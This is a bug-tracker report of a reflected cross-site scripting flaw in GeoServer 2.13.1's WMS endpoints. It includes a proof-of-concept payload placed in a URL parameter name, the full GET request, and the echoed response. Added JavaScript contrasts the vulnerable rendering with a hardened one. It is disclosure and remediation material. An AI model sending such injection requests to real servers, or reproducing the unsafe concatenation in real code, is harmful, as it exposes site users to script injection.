Reflected cross-site scripting vulnerabilities in wms

Description

From our security test:
The name of an arbitrarily supplied URL parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 25064;alert(1)//419 was submitted in the name of an arbitrarily supplied URL parameter. This input was echoed as 25064;ALERT(1)//419 in the application's response.

GET /geoserver/nurc/wms?service=WMS&version=1.1.0&request=GetMap&layers=nurc:Arc_Sample&styles=&bbox=-180.0,-90.0,180.0,90.0&width=768&height=384&srs=EPSG:4326&format=application/openlayers&25064%3balert(1)%2f%2f419=1 HTTP/1.1

*Response*
HTTP/1.1 200 OK
X-Frame-Options: SAMEORIGIN
.....
params: {'FORMAT': format,
'VERSION': '1.1.1',
25064;ALERT(1)//419: '1',
STYLES: '',
LAYERS: 'nurc:Arc_Sample',
}
......

This is for
/geoserver/nurc/wms
/geoserver/sf/wms
etc.
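The defect reported above is a server-side template that concatenates request parameter names straight into a JavaScript object literal. The following is an added illustration, not GeoServer's own code: a hypothetical `renderParamsUnsafe` that reproduces the reported behaviour beside a hardened `renderParamsSafe` that serialises keys and values as JSON string literals and drops names that do not match an assumed pattern for WMS parameter names, plus a small check a tester can run against the rendered script.

```javascript
// Constructed request parameters mirroring the report (hypothetical sample input).
const REPORTED_PARAMS = {
  format: 'application/openlayers',
  styles: '',
  layers: 'nurc:Arc_Sample',
  '25064;alert(1)//419': '1',   // attacker-controlled parameter NAME
};

// Vulnerable rendering (hypothetical, modelled on the response in the report):
// the raw parameter name is written into the script, so ';' and '//' in the
// name end the property and start a statement instead of staying data.
function renderParamsUnsafe(params) {
  const lines = Object.entries(params)
    .map(([k, v]) => `  ${k.toUpperCase()}: '${v}',`);
  return `params: {\n${lines.join('\n')}\n}`;
}

// Assumed shape of legitimate WMS parameter names (letters, digits, '_', '.', ':', '-').
const WMS_KEY = /^[A-Za-z0-9_.:-]+$/;

// Hardened rendering: unexpected names are rejected outright, and everything
// that remains is emitted via JSON.stringify, which quotes and escapes keys
// and values so they can only ever be read as string data. '<' is escaped as
// well so the output cannot terminate an enclosing <script> element.
function renderParamsSafe(params) {
  const out = {};
  for (const [k, v] of Object.entries(params)) {
    if (!WMS_KEY.test(k)) continue;
    out[k.toUpperCase()] = String(v);
  }
  const json = JSON.stringify(out, null, 2).replace(/</g, '\\u003c');
  return `params: ${json}`;
}

// Check for the reported symptom: does the rendered script still carry the
// parameter name verbatim? (True for the vulnerable renderer, false once fixed.)
function reflectsRawName(rendered, name) {
  return rendered.includes(name);
}

// Parse the hardened output back to confirm it is plain data, not code.
function parseSafeParams(rendered) {
  return JSON.parse(rendered.slice('params: '.length));
}
```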

Environment

Centos 7

Status

Assignee

Unassigned

Reporter

Nenad Steric

Triage

None

Fix versions

Affects versions

2.13.1

Components

Priority

Medium